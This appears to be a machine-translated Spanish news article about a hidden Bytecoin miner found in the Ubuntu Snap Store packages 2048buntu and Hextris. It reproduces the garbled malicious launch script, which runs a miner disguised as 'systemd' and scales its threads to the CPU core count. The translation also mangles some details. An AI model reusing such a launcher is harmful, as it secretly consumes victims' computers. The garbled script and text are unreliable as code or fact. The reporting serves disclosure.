Un usuario de Ubuntu identificó un código malicioso que mina Bytecoin BCN escondido en el código fuente del paquete snap de Ubuntu 2048buntu y Hextris en la tienda Snap Store oficial de Ubuntu.
La aplicación maliciosa 2048buntu parece ser una copia del legítimo juego 2024 que se alojó en la Tienda Snap de Ubuntu.
Tanto los paquetes "2048buntu y Hextris" que contienen códigos de criptomonedas agregados a la tienda por el usuario Nicolas Tomb y la cuenta codificada son myfirstferrari@protonmail.com.
Un usuario de Ubuntu según el nombre de Github "tarwirdur" identificó que la aplicación contiene un minero de criptomoneda oculto en el daemon "systemd" y la aplicación afectada contiene "guión de inicio" que permite que el guión se ejecute en segundo plano.
#! / bin / bash
moneda = bcn
Nombre = 2048buntu
{ # tratar
/ snap /$name/current/systemd -u myfirstferrari@protonmail.com - $currency 1 -g
} || { # captura
núcleos=($ (grep -c ^ procesador / proc / cpuinfo))
if (($ núcleos <4)); entonces
/snap/$name/current/systemd -u myfirstferrari@protonmail.com - $currency 1
más
/snap/$ name/current/systemd -u myfirstferrari@protonmail.com - $currency 2
ser
}
Al igual que la Play Store de Android, Snap Store no proporciona una cantidad de instalaciones, por lo que no está claro cuántos usuarios se vieron afectados por la criptomoneda oculta miner.
Con la tienda de Ubuntu, cualquiera puede crear y alojar aplicaciones como, por ejemplo, Chrome web store, iOS App Store y Google Play Store.
Según omgubuntu, "todas las aplicaciones cargadas se someterán a pruebas automáticas para asegurar que la compatibilidad en múltiples distribuciones y las instantáneas del marco actual no se marquen línea por línea, por lo que es difícil evitar que estos mineros se publiquen en la tienda Snap".
Todas las aplicaciones cargadas por el usuario Nicolas Tomb se eliminaron de la Tienda Snap de Ubuntu y está pendiente de nuevas investigaciones. Puede encontrar la página en la memoria caché de Google.
Fecha actualización el 2021-05-14. Fecha publicación el 2018-05-14. Categoría: facebook. Autor: Oscar olg Mapa del sitio Fuente: gbhackers